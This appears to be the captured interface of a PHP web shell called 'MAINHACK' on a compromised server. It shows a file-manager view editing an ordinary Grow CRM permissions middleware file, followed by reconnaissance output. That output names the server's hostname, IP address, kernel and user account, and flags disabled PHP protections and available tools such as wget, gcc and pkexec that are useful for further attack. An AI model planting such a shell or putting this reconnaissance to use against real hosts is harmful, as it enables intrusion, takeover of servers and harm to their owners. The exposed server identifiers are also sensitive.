[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Participate.php
<?php /** -------------------------------------------------------------------------------- * This middleware class handles [participation] precheck processes for leads * * @package Grow CRM * @author NextLoop *----------------------------------------------------------------------------------*/ namespace App\Http\Middleware\Leads; use App\Models\Lead; use App\Permissions\LeadPermissions; use Closure; use Log; class Participate { /** * The permisson repository instance. */ protected $leadpermissions; /** * Inject any dependencies here * */ public function __construct(LeadPermissions $leadpermissions) { //lead permissions repo $this->leadpermissions = $leadpermissions; } /** * Check user permissions to edit a lead * @param \Illuminate\Http\Request $request * @param \Closure $next * @return mixed */ public function handle($request, Closure $next) { //validate module status if (!config('visibility.modules.leads')) { abort(404, __('lang.the_requested_service_not_found')); return $next($request); } //lead id $lead_id = $request->route('lead'); //does the lead exist if ($lead_id == '' || !$lead = \App\Models\Lead::Where('lead_id', $lead_id)->first()) { Log::error("lead could not be found", ['process' => '[permissions][leads][participate]', 'ref' => config('app.debug_ref'), 'function' => __function__, 'file' => basename(__FILE__), 'line' => __line__, 'path' => __file__, 'lead id' => $lead_id ?? '']); abort(404); } //permission team if (auth()->user()->is_team) { if ($this->leadpermissions->check('participate', $lead_id)) { return $next($request); } } //permission client if (auth()->user()->is_client) { //check generally if ($this->leadpermissions->check('participate', $lead_id)) { //check if project allows if ($project = \App\Models\Project::Where('project_id', $lead->lead_projectid)->first()) { if ($project->clientperm_leads_collaborate == 'yes') { return $next($request); } } } } //no items were passed with this request Log::error("permission denied", ['process' => '[permissions][leads][participate]', 'ref' => config('app.debug_ref'), 'function' => __function__, 'file' => basename(__FILE__), 'line' => __line__, 'path' => __file__, 'lead id' => $lead_id ?? '']); abort(403); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002